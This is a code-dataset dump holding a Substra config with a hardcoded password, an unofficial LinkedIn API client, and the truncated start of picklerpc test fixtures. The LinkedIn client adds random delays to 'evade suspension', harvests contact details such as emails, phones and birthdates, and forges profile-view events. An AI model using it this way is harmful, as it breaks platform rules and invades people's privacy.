ext
stringclasses 9
values | sha
stringlengths 40
40
| content
stringlengths 3
1.04M
|
---|---|---|
py | 7dfff5fb6637a5f9b25472610d34e22f1af78de5 | # Copyright 2018 Owkin, inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
SUBSTRA_PATH = os.getenv('SUBSTRA_PATH', '/substra')
user = {
'name': 'user-owkin',
'pass': 'user-owkinpw',
'home': f'{SUBSTRA_PATH}/data/orgs/owkin/user',
'cert': f'{SUBSTRA_PATH}/data/orgs/owkin/user/msp/signcerts/cert.pem',
'private_key': f'{SUBSTRA_PATH}/data/orgs/owkin/user/msp/keystore/key.pem',
}
|
py | 7dfff60f047325248e58a31f8ca8138707c36b5e | """
Provides linkedin api-related code
"""
import json
import logging
import random
from operator import itemgetter
from time import sleep, time
from urllib.parse import urlencode, quote
from linkedin_api.client import Client
from linkedin_api.utils.helpers import (
get_id_from_urn,
get_update_author_name,
get_update_old,
get_update_content,
get_update_author_profile,
get_update_url,
append_update_post_field_to_posts_list,
parse_list_raw_urns,
parse_list_raw_posts,
get_list_posts_sorted_without_promoted,
)
logger = logging.getLogger(__name__)
def default_evade():
"""
A catch-all method to try and evade suspension from Linkedin.
Currenly, just delays the request by a random (bounded) time
"""
sleep(random.randint(2, 5)) # sleep a random duration to try and evade suspention
class Linkedin(object):
"""
Class for accessing the LinkedIn API.
:param username: Username of LinkedIn account.
:type username: str
:param password: Password of LinkedIn account.
:type password: str
"""
_MAX_UPDATE_COUNT = 100 # max seems to be 100
_MAX_SEARCH_COUNT = 49 # max seems to be 49, and min seems to be 2
_MAX_REPEATED_REQUESTS = (
200 # VERY conservative max requests count to avoid rate-limit
)
def __init__(
self,
username,
password,
*,
authenticate=True,
refresh_cookies=False,
debug=False,
proxies={},
cookies=None,
cookies_dir=None,
):
"""Constructor method"""
self.client = Client(
refresh_cookies=refresh_cookies,
debug=debug,
proxies=proxies,
cookies_dir=cookies_dir,
)
logging.basicConfig(level=logging.DEBUG if debug else logging.INFO)
self.logger = logger
if authenticate:
if cookies:
# If the cookies are expired, the API won't work anymore since
# `username` and `password` are not used at all in this case.
self.client._set_session_cookies(cookies)
else:
self.client.authenticate(username, password)
def _fetch(self, uri, evade=default_evade, base_request=False, **kwargs):
"""GET request to Linkedin API"""
evade()
url = f"{self.client.API_BASE_URL if not base_request else self.client.LINKEDIN_BASE_URL}{uri}"
return self.client.session.get(url, **kwargs)
def _post(self, uri, evade=default_evade, base_request=False, **kwargs):
"""POST request to Linkedin API"""
evade()
url = f"{self.client.API_BASE_URL if not base_request else self.client.LINKEDIN_BASE_URL}{uri}"
return self.client.session.post(url, **kwargs)
def search(self, params, limit=-1, offset=0):
"""Perform a LinkedIn search.
:param params: Search parameters (see code)
:type params: dict
:param limit: Maximum length of the returned list, defaults to -1 (no limit)
:type limit: int, optional
:param offset: Index to start searching from
:type offset: int, optional
:return: List of search results
:rtype: list
"""
count = Linkedin._MAX_SEARCH_COUNT
if limit is None:
limit = -1
results = []
while True:
# when we're close to the limit, only fetch what we need to
if limit > -1 and limit - len(results) < count:
count = limit - len(results)
default_params = {
"count": str(count),
"filters": "List()",
"origin": "GLOBAL_SEARCH_HEADER",
"q": "all",
"start": len(results) + offset,
"queryContext": "List(spellCorrectionEnabled->true,relatedSearchesEnabled->true,kcardTypes->PROFILE|COMPANY)",
}
default_params.update(params)
res = self._fetch(
f"/search/blended?{urlencode(default_params, safe='(),')}",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
data = res.json()
new_elements = []
elements = data.get("data", {}).get("elements", [])
for i in range(len(elements)):
new_elements.extend(elements[i]["elements"])
# not entirely sure what extendedElements generally refers to - keyword search gives back a single job?
# new_elements.extend(data["data"]["elements"][i]["extendedElements"])
results.extend(new_elements)
# break the loop if we're done searching
# NOTE: we could also check for the `total` returned in the response.
# This is in data["data"]["paging"]["total"]
if (
(
limit > -1 and len(results) >= limit
) # if our results exceed set limit
or len(results) / count >= Linkedin._MAX_REPEATED_REQUESTS
) or len(new_elements) == 0:
break
self.logger.debug(f"results grew to {len(results)}")
return results
def search_people(
self,
keywords=None,
connection_of=None,
network_depths=None,
current_company=None,
past_companies=None,
nonprofit_interests=None,
profile_languages=None,
regions=None,
industries=None,
schools=None,
contact_interests=None,
service_categories=None,
include_private_profiles=False, # profiles without a public id, "Linkedin Member"
# Keywords filter
keyword_first_name=None,
keyword_last_name=None,
keyword_title=None, # `keyword_title` and `title` are the same. We kept `title` for backward compatibility. Please only use one of them.
keyword_company=None,
keyword_school=None,
network_depth=None, # DEPRECATED - use network_depths
title=None, # DEPRECATED - use keyword_title
**kwargs,
):
"""Perform a LinkedIn search for people.
:param keywords: Keywords to search on
:type keywords: str, optional
:param current_company: A list of company URN IDs (str)
:type current_company: list, optional
:param past_companies: A list of company URN IDs (str)
:type past_companies: list, optional
:param regions: A list of geo URN IDs (str)
:type regions: list, optional
:param industries: A list of industry URN IDs (str)
:type industries: list, optional
:param schools: A list of school URN IDs (str)
:type schools: list, optional
:param profile_languages: A list of 2-letter language codes (str)
:type profile_languages: list, optional
:param contact_interests: A list containing one or both of "proBono" and "boardMember"
:type contact_interests: list, optional
:param service_categories: A list of service category URN IDs (str)
:type service_categories: list, optional
:param network_depth: Deprecated, use `network_depths`. One of "F", "S" and "O" (first, second and third+ respectively)
:type network_depth: str, optional
:param network_depths: A list containing one or many of "F", "S" and "O" (first, second and third+ respectively)
:type network_depths: list, optional
:param include_private_profiles: Include private profiles in search results. If False, only public profiles are included. Defaults to False
:type include_private_profiles: boolean, optional
:param keyword_first_name: First name
:type keyword_first_name: str, optional
:param keyword_last_name: Last name
:type keyword_last_name: str, optional
:param keyword_title: Job title
:type keyword_title: str, optional
:param keyword_company: Company name
:type keyword_company: str, optional
:param keyword_school: School name
:type keyword_school: str, optional
:param connection_of: Connection of LinkedIn user, given by profile URN ID
:type connection_of: str, optional
:return: List of profiles (minimal data only)
:rtype: list
"""
filters = ["resultType->PEOPLE"]
if connection_of:
filters.append(f"connectionOf->{connection_of}")
if network_depths:
filters.append(f'network->{"|".join(network_depths)}')
elif network_depth:
filters.append(f"network->{network_depth}")
if regions:
filters.append(f'geoUrn->{"|".join(regions)}')
if industries:
filters.append(f'industry->{"|".join(industries)}')
if current_company:
filters.append(f'currentCompany->{"|".join(current_company)}')
if past_companies:
filters.append(f'pastCompany->{"|".join(past_companies)}')
if profile_languages:
filters.append(f'profileLanguage->{"|".join(profile_languages)}')
if nonprofit_interests:
filters.append(f'nonprofitInterest->{"|".join(nonprofit_interests)}')
if schools:
filters.append(f'schools->{"|".join(schools)}')
if service_categories:
filters.append(f'serviceCategory->{"|".join(service_categories)}')
# `Keywords` filter
keyword_title = keyword_title if keyword_title else title
if keyword_first_name:
filters.append(f"firstName->{keyword_first_name}")
if keyword_last_name:
filters.append(f"lastName->{keyword_last_name}")
if keyword_title:
filters.append(f"title->{keyword_title}")
if keyword_company:
filters.append(f"company->{keyword_company}")
if keyword_school:
filters.append(f"school->{keyword_school}")
params = {"filters": "List({})".format(",".join(filters))}
if keywords:
params["keywords"] = keywords
data = self.search(params, **kwargs)
results = []
for item in data:
if not include_private_profiles and "publicIdentifier" not in item:
continue
results.append(
{
"urn_id": get_id_from_urn(item.get("targetUrn")),
"distance": item.get("memberDistance", {}).get("value"),
"public_id": item.get("publicIdentifier"),
"tracking_id": get_id_from_urn(item.get("trackingUrn")),
}
)
return results
def search_companies(self, keywords=None, **kwargs):
"""Perform a LinkedIn search for companies.
:param keywords: A list of search keywords (str)
:type keywords: list, optional
:return: List of companies
:rtype: list
"""
filters = ["resultType->COMPANIES"]
params = {
"filters": "List({})".format(",".join(filters)),
"queryContext": "List(spellCorrectionEnabled->true)",
}
if keywords:
params["keywords"] = keywords
data = self.search(params, **kwargs)
results = []
for item in data:
if item.get("type") != "COMPANY":
continue
results.append(
{
"urn": item.get("targetUrn"),
"urn_id": get_id_from_urn(item.get("targetUrn")),
"name": item.get("title", {}).get("text"),
"headline": item.get("headline", {}).get("text"),
"subline": item.get("subline", {}).get("text"),
}
)
return results
def search_jobs(
self,
keywords=None,
companies=None,
experience=None,
job_type=None,
job_title=None,
industries=None,
location_name=None,
remote=True,
listed_at=86400,
limit=-1,
offset=0,
**kwargs,
):
"""Perform a LinkedIn search for jobs.
:param keywords: Search keywords (str)
:type keywords: str, optional
:param companies: A list of company URN IDs (str)
:type companies: list, optional
:param experience: A list of experience levels, one or many of "1", "2", "3", "4", "5" and "6" (internship, entry level, associate, mid-senior level, director and executive, respectively)
:type experience: list, optional
:param job_type: A list of job types , one or many of "F", "C", "P", "T", "I", "V", "O" (full-time, contract, part-time, temporary, internship, volunteer and "other", respectively)
:type job_type: list, optional
:param job_title: A list of title URN IDs (str)
:type job_title: list, optional
:param industries: A list of industry URN IDs (str)
:type industries: list, optional
:param location_name: Name of the location to search within
:type location_name: str, optional
:param remote: Whether to include remote jobs. Defaults to True
:type remote: boolean, optional
:return: List of jobs
:rtype: list
"""
count = Linkedin._MAX_SEARCH_COUNT
if limit is None:
limit = -1
params = {}
if keywords:
params["keywords"] = keywords
filters = ["resultType->JOBS"]
if companies:
filters.append(f'company->{"|".join(companies)}')
if experience:
filters.append(f'experience->{"|".join(experience)}')
if job_type:
filters.append(f'jobType->{"|".join(job_type)}')
if job_title:
filters.append(f'title->{"|".join(job_title)}')
if industries:
filters.append(f'industry->{"|".join(industries)}')
if location_name:
filters.append(f'locationFallback->{"|".join(location_name)}')
if remote:
filters.append(f"commuteFeatures->f_WRA")
results = []
while True:
# when we're close to the limit, only fetch what we need to
if limit > -1 and limit - len(results) < count:
count = limit - len(results)
default_params = {
"decorationId": "com.linkedin.voyager.deco.jserp.WebJobSearchHitWithSalary-14",
"count": count,
"filters": f"List({filters})",
"origin": "JOB_SEARCH_RESULTS_PAGE",
"q": "jserpFilters",
"start": len(results) + offset,
"queryContext": "List(primaryHitType->JOBS,spellCorrectionEnabled->true)",
}
default_params.update(params)
res = self._fetch(
f"/search/hits?{urlencode(default_params, safe='(),')}",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
data = res.json()
elements = data.get("included", [])
results.extend(
[
i
for i in elements
if i["$type"] == "com.linkedin.voyager.jobs.JobPosting"
]
)
# break the loop if we're done searching
# NOTE: we could also check for the `total` returned in the response.
# This is in data["data"]["paging"]["total"]
if (
(
limit > -1 and len(results) >= limit
) # if our results exceed set limit
or len(results) / count >= Linkedin._MAX_REPEATED_REQUESTS
) or len(elements) == 0:
break
self.logger.debug(f"results grew to {len(results)}")
return results
def get_profile_contact_info(self, public_id=None, urn_id=None):
"""Fetch contact information for a given LinkedIn profile. Pass a [public_id] or a [urn_id].
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: Contact data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_id or urn_id}/profileContactInfo"
)
data = res.json()
contact_info = {
"email_address": data.get("emailAddress"),
"websites": [],
"twitter": data.get("twitterHandles"),
"birthdate": data.get("birthDateOn"),
"ims": data.get("ims"),
"phone_numbers": data.get("phoneNumbers", []),
}
websites = data.get("websites", [])
for item in websites:
if "com.linkedin.voyager.identity.profile.StandardWebsite" in item["type"]:
item["label"] = item["type"][
"com.linkedin.voyager.identity.profile.StandardWebsite"
]["category"]
elif "" in item["type"]:
item["label"] = item["type"][
"com.linkedin.voyager.identity.profile.CustomWebsite"
]["label"]
del item["type"]
contact_info["websites"] = websites
return contact_info
def get_profile_skills(self, public_id=None, urn_id=None):
"""Fetch the skills listed on a given LinkedIn profile.
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: List of skill objects
:rtype: list
"""
params = {"count": 100, "start": 0}
res = self._fetch(
f"/identity/profiles/{public_id or urn_id}/skills", params=params
)
data = res.json()
skills = data.get("elements", [])
for item in skills:
del item["entityUrn"]
return skills
def get_profile(self, public_id=None, urn_id=None):
"""Fetch data for a given LinkedIn profile.
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: Profile data
:rtype: dict
"""
# NOTE this still works for now, but will probably eventually have to be converted to
# https://www.linkedin.com/voyager/api/identity/profiles/ACoAAAKT9JQBsH7LwKaE9Myay9WcX8OVGuDq9Uw
res = self._fetch(f"/identity/profiles/{public_id or urn_id}/profileView")
data = res.json()
if data and "status" in data and data["status"] != 200:
self.logger.info("request failed: {}".format(data["message"]))
return {}
# massage [profile] data
profile = data["profile"]
if "miniProfile" in profile:
if "picture" in profile["miniProfile"]:
profile["displayPictureUrl"] = profile["miniProfile"]["picture"][
"com.linkedin.common.VectorImage"
]["rootUrl"]
images_data = profile["miniProfile"]["picture"][
"com.linkedin.common.VectorImage"
]["artifacts"]
for img in images_data:
w, h, url_segment = itemgetter(
"width", "height", "fileIdentifyingUrlPathSegment"
)(img)
profile[f"img_{w}_{h}"] = url_segment
profile["profile_id"] = get_id_from_urn(profile["miniProfile"]["entityUrn"])
profile["profile_urn"] = profile["miniProfile"]["entityUrn"]
profile["member_urn"] = profile["miniProfile"]["objectUrn"]
del profile["miniProfile"]
del profile["defaultLocale"]
del profile["supportedLocales"]
del profile["versionTag"]
del profile["showEducationOnProfileTopCard"]
# massage [experience] data
experience = data["positionView"]["elements"]
for item in experience:
if "company" in item and "miniCompany" in item["company"]:
if "logo" in item["company"]["miniCompany"]:
logo = item["company"]["miniCompany"]["logo"].get(
"com.linkedin.common.VectorImage"
)
if logo:
item["companyLogoUrl"] = logo["rootUrl"]
del item["company"]["miniCompany"]
profile["experience"] = experience
# massage [education] data
education = data["educationView"]["elements"]
for item in education:
if "school" in item:
if "logo" in item["school"]:
item["school"]["logoUrl"] = item["school"]["logo"][
"com.linkedin.common.VectorImage"
]["rootUrl"]
del item["school"]["logo"]
profile["education"] = education
# massage [languages] data
languages = data["languageView"]["elements"]
for item in languages:
del item["entityUrn"]
profile["languages"] = languages
# massage [publications] data
publications = data["publicationView"]["elements"]
for item in publications:
del item["entityUrn"]
for author in item.get("authors", []):
del author["entityUrn"]
profile["publications"] = publications
# massage [certifications] data
certifications = data["certificationView"]["elements"]
for item in certifications:
del item["entityUrn"]
profile["certifications"] = certifications
# massage [volunteer] data
volunteer = data["volunteerExperienceView"]["elements"]
for item in volunteer:
del item["entityUrn"]
profile["volunteer"] = volunteer
# massage [honors] data
honors = data["honorView"]["elements"]
for item in honors:
del item["entityUrn"]
profile["honors"] = honors
return profile
def get_profile_connections(self, urn_id):
"""Fetch first-degree connections for a given LinkedIn profile.
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str
:return: List of search results
:rtype: list
"""
return self.search_people(connection_of=urn_id, network_depth="F")
def get_company_updates(
self, public_id=None, urn_id=None, max_results=None, results=[]
):
"""Fetch company updates (news activity) for a given LinkedIn company.
:param public_id: LinkedIn public ID for a company
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a company
:type urn_id: str, optional
:return: List of company update objects
:rtype: list
"""
params = {
"companyUniversalName": {public_id or urn_id},
"q": "companyFeedByUniversalName",
"moduleKey": "member-share",
"count": Linkedin._MAX_UPDATE_COUNT,
"start": len(results),
}
res = self._fetch(f"/feed/updates", params=params)
data = res.json()
if (
len(data["elements"]) == 0
or (max_results is not None and len(results) >= max_results)
or (
max_results is not None
and len(results) / max_results >= Linkedin._MAX_REPEATED_REQUESTS
)
):
return results
results.extend(data["elements"])
self.logger.debug(f"results grew: {len(results)}")
return self.get_company_updates(
public_id=public_id,
urn_id=urn_id,
results=results,
max_results=max_results,
)
def get_profile_updates(
self, public_id=None, urn_id=None, max_results=None, results=[]
):
"""Fetch profile updates (newsfeed activity) for a given LinkedIn profile.
:param public_id: LinkedIn public ID for a profile
:type public_id: str, optional
:param urn_id: LinkedIn URN ID for a profile
:type urn_id: str, optional
:return: List of profile update objects
:rtype: list
"""
params = {
"profileId": {public_id or urn_id},
"q": "memberShareFeed",
"moduleKey": "member-share",
"count": Linkedin._MAX_UPDATE_COUNT,
"start": len(results),
}
res = self._fetch(f"/feed/updates", params=params)
data = res.json()
if (
len(data["elements"]) == 0
or (max_results is not None and len(results) >= max_results)
or (
max_results is not None
and len(results) / max_results >= Linkedin._MAX_REPEATED_REQUESTS
)
):
return results
results.extend(data["elements"])
self.logger.debug(f"results grew: {len(results)}")
return self.get_profile_updates(
public_id=public_id,
urn_id=urn_id,
results=results,
max_results=max_results,
)
def get_current_profile_views(self):
"""Get profile view statistics, including chart data.
:return: Profile view data
:rtype: dict
"""
res = self._fetch(f"/identity/wvmpCards")
data = res.json()
return data["elements"][0]["value"][
"com.linkedin.voyager.identity.me.wvmpOverview.WvmpViewersCard"
]["insightCards"][0]["value"][
"com.linkedin.voyager.identity.me.wvmpOverview.WvmpSummaryInsightCard"
][
"numViews"
]
def get_school(self, public_id):
"""Fetch data about a given LinkedIn school.
:param public_id: LinkedIn public ID for a school
:type public_id: str
:return: School data
:rtype: dict
"""
params = {
"decorationId": "com.linkedin.voyager.deco.organization.web.WebFullCompanyMain-12",
"q": "universalName",
"universalName": public_id,
}
res = self._fetch(f"/organization/companies?{urlencode(params)}")
data = res.json()
if data and "status" in data and data["status"] != 200:
self.logger.info("request failed: {}".format(data))
return {}
school = data["elements"][0]
return school
def get_company(self, public_id):
"""Fetch data about a given LinkedIn company.
:param public_id: LinkedIn public ID for a company
:type public_id: str
:return: Company data
:rtype: dict
"""
params = {
"decorationId": "com.linkedin.voyager.deco.organization.web.WebFullCompanyMain-12",
"q": "universalName",
"universalName": public_id,
}
res = self._fetch(f"/organization/companies", params=params)
data = res.json()
if data and "status" in data and data["status"] != 200:
self.logger.info("request failed: {}".format(data["message"]))
return {}
company = data["elements"][0]
return company
def get_conversation_details(self, profile_urn_id):
"""Fetch conversation (message thread) details for a given LinkedIn profile.
:param profile_urn_id: LinkedIn URN ID for a profile
:type profile_urn_id: str
:return: Conversation data
:rtype: dict
"""
# passing `params` doesn't work properly, think it's to do with List().
# Might be a bug in `requests`?
res = self._fetch(
f"/messaging/conversations?\
keyVersion=LEGACY_INBOX&q=participants&recipients=List({profile_urn_id})"
)
data = res.json()
item = data["elements"][0]
item["id"] = get_id_from_urn(item["entityUrn"])
return item
def get_conversations(self):
"""Fetch list of conversations the user is in.
:return: List of conversations
:rtype: list
"""
params = {"keyVersion": "LEGACY_INBOX"}
res = self._fetch(f"/messaging/conversations", params=params)
return res.json()
def get_conversation(self, conversation_urn_id):
"""Fetch data about a given conversation.
:param conversation_urn_id: LinkedIn URN ID for a conversation
:type conversation_urn_id: str
:return: Conversation data
:rtype: dict
"""
res = self._fetch(f"/messaging/conversations/{conversation_urn_id}/events")
return res.json()
def send_message(self, message_body, conversation_urn_id=None, recipients=None):
"""Send a message to a given conversation.
:param message_body: LinkedIn URN ID for a conversation
:type message_body: str
:param conversation_urn_id: LinkedIn URN ID for a conversation
:type conversation_urn_id: str, optional
:param recipients: List of profile urn id's
:type recipients: list, optional
:return: Error state. If True, an error occured.
:rtype: boolean
"""
params = {"action": "create"}
if not (conversation_urn_id or recipients):
self.logger.debug("Must provide [conversation_urn_id] or [recipients].")
return True
message_event = {
"eventCreate": {
"value": {
"com.linkedin.voyager.messaging.create.MessageCreate": {
"body": message_body,
"attachments": [],
"attributedBody": {
"text": message_body,
"attributes": [],
},
"mediaAttachments": [],
}
}
}
}
if conversation_urn_id and not recipients:
res = self._post(
f"/messaging/conversations/{conversation_urn_id}/events",
params=params,
data=json.dumps(message_event),
)
elif recipients and not conversation_urn_id:
message_event["recipients"] = recipients
message_event["subtype"] = "MEMBER_TO_MEMBER"
payload = {
"keyVersion": "LEGACY_INBOX",
"conversationCreate": message_event,
}
res = self._post(
f"/messaging/conversations",
params=params,
data=json.dumps(payload),
)
return res.status_code != 201
def mark_conversation_as_seen(self, conversation_urn_id):
"""Send 'seen' to a given conversation.
:param conversation_urn_id: LinkedIn URN ID for a conversation
:type conversation_urn_id: str
:return: Error state. If True, an error occured.
:rtype: boolean
"""
payload = json.dumps({"patch": {"$set": {"read": True}}})
res = self._post(
f"/messaging/conversations/{conversation_urn_id}", data=payload
)
return res.status_code != 200
def get_user_profile(self, use_cache=True):
"""Get the current user profile. If not cached, a network request will be fired.
:return: Profile data for currently logged in user
:rtype: dict
"""
me_profile = self.client.metadata.get("me")
if not self.client.metadata.get("me") or not use_cache:
res = self._fetch(f"/me")
me_profile = res.json()
# cache profile
self.client.metadata["me"] = me_profile
return me_profile
def get_invitations(self, start=0, limit=3):
"""Fetch connection invitations for the currently logged in user.
:param start: How much to offset results by
:type start: int
:param limit: Maximum amount of invitations to return
:type limit: int
:return: List of invitation objects
:rtype: list
"""
params = {
"start": start,
"count": limit,
"includeInsights": True,
"q": "receivedInvitation",
}
res = self._fetch(
f"{self.client.API_BASE_URL}/relationships/invitationViews",
params=params,
)
if res.status_code != 200:
return []
response_payload = res.json()
return [element["invitation"] for element in response_payload["elements"]]
def reply_invitation(
self, invitation_entity_urn, invitation_shared_secret, action="accept"
):
"""Respond to a connection invitation. By default, accept the invitation.
:param invitation_entity_urn: URN ID of the invitation
:type invitation_entity_urn: int
:param invitation_shared_secret: Shared secret of invitation
:type invitation_shared_secret: str
:param action: "accept" or "reject". Defaults to "accept"
:type action: str, optional
:return: Success state. True if successful
:rtype: boolean
"""
invitation_id = get_id_from_urn(invitation_entity_urn)
params = {"action": action}
payload = json.dumps(
{
"invitationId": invitation_id,
"invitationSharedSecret": invitation_shared_secret,
"isGenericInvitation": False,
}
)
res = self._post(
f"{self.client.API_BASE_URL}/relationships/invitations/{invitation_id}",
params=params,
data=payload,
)
return res.status_code == 200
def remove_connection(self, public_profile_id):
"""Remove a given profile as a connection.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Error state. True if error occurred
:rtype: boolean
"""
res = self._post(
f"/identity/profiles/{public_profile_id}/profileActions?action=disconnect",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
return res.status_code != 200
def track(self, eventBody, eventInfo):
payload = {"eventBody": eventBody, "eventInfo": eventInfo}
res = self._post(
"/li/track",
base_request=True,
headers={
"accept": "*/*",
"content-type": "text/plain;charset=UTF-8",
},
data=json.dumps(payload),
)
return res.status_code != 200
def view_profile(
self,
target_profile_public_id,
target_profile_member_urn_id=None,
network_distance=None,
):
"""View a profile, notifying the user that you "viewed" their profile.
Provide [target_profile_member_urn_id] and [network_distance] to save 2 network requests and
speed up the execution of this function.
:param target_profile_public_id: public ID of a LinkedIn profile
:type target_profile_public_id: str
:param network_distance: How many degrees of separation exist e.g. 2
:type network_distance: int, optional
:param target_profile_member_urn_id: member URN id for target profile
:type target_profile_member_urn_id: str, optional
:return: Error state. True if error occurred
:rtype: boolean
"""
me_profile = self.get_user_profile()
if not target_profile_member_urn_id:
profile = self.get_profile(public_id=target_profile_public_id)
target_profile_member_urn_id = int(get_id_from_urn(profile["member_urn"]))
if not network_distance:
profile_network_info = self.get_profile_network_info(
public_profile_id=target_profile_public_id
)
network_distance = int(
profile_network_info["distance"]
.get("value", "DISTANCE_2")
.split("_")[1]
)
viewer_privacy_setting = "F"
me_member_id = me_profile["plainId"]
client_application_instance = self.client.metadata["clientApplicationInstance"]
eventBody = {
"viewerPrivacySetting": viewer_privacy_setting,
"networkDistance": network_distance,
"vieweeMemberUrn": f"urn:li:member:{target_profile_member_urn_id}",
"profileTrackingId": self.client.metadata["clientPageInstanceId"],
"entityView": {
"viewType": "profile-view",
"viewerId": me_member_id,
"targetId": target_profile_member_urn_id,
},
"header": {
"pageInstance": {
"pageUrn": "urn:li:page:d_flagship3_profile_view_base",
"trackingId": self.client.metadata["clientPageInstanceId"],
},
"time": int(time()),
"version": client_application_instance["version"],
"clientApplicationInstance": client_application_instance,
},
"requestHeader": {
"interfaceLocale": "en_US",
"pageKey": "d_flagship3_profile_view_base",
"path": f"/in/{target_profile_member_urn_id}/",
"referer": "https://www.linkedin.com/feed/",
},
}
return self.track(
eventBody,
{
"appId": "com.linkedin.flagship3.d_web",
"eventName": "ProfileViewEvent",
"topicName": "ProfileViewEvent",
},
)
def get_profile_privacy_settings(self, public_profile_id):
"""Fetch privacy settings for a given LinkedIn profile.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Privacy settings data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_profile_id}/privacySettings",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
if res.status_code != 200:
return {}
data = res.json()
return data.get("data", {})
def get_profile_member_badges(self, public_profile_id):
"""Fetch badges for a given LinkedIn profile.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Badges data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_profile_id}/memberBadges",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
if res.status_code != 200:
return {}
data = res.json()
return data.get("data", {})
def get_profile_network_info(self, public_profile_id):
"""Fetch network information for a given LinkedIn profile.
:param public_profile_id: public ID of a LinkedIn profile
:type public_profile_id: str
:return: Network data
:rtype: dict
"""
res = self._fetch(
f"/identity/profiles/{public_profile_id}/networkinfo",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
if res.status_code != 200:
return {}
data = res.json()
return data.get("data", {})
def unfollow_entity(self, urn_id):
"""Unfollow a given entity.
:param urn_id: URN ID of entity to unfollow
:type urn_id: str
:return: Error state. Returns True if error occurred
:rtype: boolean
"""
payload = {"urn": f"urn:li:fs_followingInfo:{urn_id}"}
res = self._post(
"/feed/follows?action=unfollowByEntityUrn",
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
data=json.dumps(payload),
)
err = False
if res.status_code != 200:
err = True
return err
def _get_list_feed_posts_and_list_feed_urns(
self, limit=-1, offset=0, exclude_promoted_posts=True
):
"""Get a list of URNs from feed sorted by 'Recent' and a list of yet
unsorted posts, each one of them containing a dict per post.
:param limit: Maximum length of the returned list, defaults to -1 (no limit)
:type limit: int, optional
:param offset: Index to start searching from
:type offset: int, optional
:param exclude_promoted_posts: Exclude from the output promoted posts
:type exclude_promoted_posts: bool, optional
:return: List of posts and list of URNs
:rtype: (list, list)
"""
_PROMOTED_STRING = "Promoted"
_PROFILE_URL = f"{self.client.LINKEDIN_BASE_URL}/in/"
l_posts = []
l_urns = []
# If count>100 API will return HTTP 400
count = Linkedin._MAX_UPDATE_COUNT
if limit == -1:
limit = Linkedin._MAX_UPDATE_COUNT
# 'l_urns' equivalent to other functions 'results' variable
l_urns = []
while True:
# when we're close to the limit, only fetch what we need to
if limit > -1 and limit - len(l_urns) < count:
count = limit - len(l_urns)
params = {
"count": str(count),
"q": "chronFeed",
"start": len(l_urns) + offset,
}
res = self._fetch(
f"/feed/updatesV2",
params=params,
headers={"accept": "application/vnd.linkedin.normalized+json+2.1"},
)
"""
Response includes two keya:
- ['Data']['*elements']. It includes the posts URNs always
properly sorted as 'Recent', including yet sponsored posts. The
downside is that fetching one by one the posts is slower. We will
save the URNs to later on build a sorted list of posts purging
promotions
- ['included']. List with all the posts attributes, but not sorted as
'Recent' and including promoted posts
"""
l_raw_posts = res.json().get("included", {})
l_raw_urns = res.json().get("data", {}).get("*elements", [])
l_new_posts = parse_list_raw_posts(
l_raw_posts, self.client.LINKEDIN_BASE_URL
)
l_posts.extend(l_new_posts)
l_urns.extend(parse_list_raw_urns(l_raw_urns))
# break the loop if we're done searching
# NOTE: we could also check for the `total` returned in the response.
# This is in data["data"]["paging"]["total"]
if (
(limit > -1 and len(l_urns) >= limit) # if our results exceed set limit
or len(l_urns) / count >= Linkedin._MAX_REPEATED_REQUESTS
) or len(l_raw_urns) == 0:
break
self.logger.debug(f"results grew to {len(l_urns)}")
return l_posts, l_urns
def get_feed_posts(self, limit=-1, offset=0, exclude_promoted_posts=True):
"""Get a list of URNs from feed sorted by 'Recent'
:param limit: Maximum length of the returned list, defaults to -1 (no limit)
:type limit: int, optional
:param offset: Index to start searching from
:type offset: int, optional
:param exclude_promoted_posts: Exclude from the output promoted posts
:type exclude_promoted_posts: bool, optional
:return: List of URNs
:rtype: list
"""
l_posts, l_urns = self._get_list_feed_posts_and_list_feed_urns(
limit, offset, exclude_promoted_posts
)
return get_list_posts_sorted_without_promoted(l_urns, l_posts)
|
py | 7dfff6405b457bedde49d5db39e70d3c5b0e02ff | import logging
import time
from threading import Thread
import pytest
from picklerpc import PickleRpcClient, PickleRpcServer
log = logging.getLogger()
@pytest.fixture
def client():
return PickleRpcClient('127.0.0.1', 62000, protocol=2)
@pytest.fixture
def server():
# Create a new subclass with a ping method.
class Pinger(PickleRpcServer):
"""Example class"""
def __init__(self, host='0.0.0.0', port=62000, protocol=None):
"""Prepare a Pinger for use."""
super(Pinger, self).__init__(host=host, port=port, protocol=protocol)
self.name = 'foo'
def ping(self):
"""
Returns PONG, and just for testing.
Returns (str):
PONG.
"""
return 'PONG'
def echo(self, message):
"""
Responds back to the caller.
Args:
message (str): Message to receive.
Returns (str):
Response.
"""
self._log.debug('Hey, we got a message: %r', message)
return 'I received: {}'.format(message)
def story(self, food='cheese', effect='moldy'):
"""
Responds back to the caller with food.
Args:
food (str): Food to work with.
effect (str): What food does.
Returns (str):
Response.
"""
self._log.debug('We got food=%s and effect=%s', food, effect)
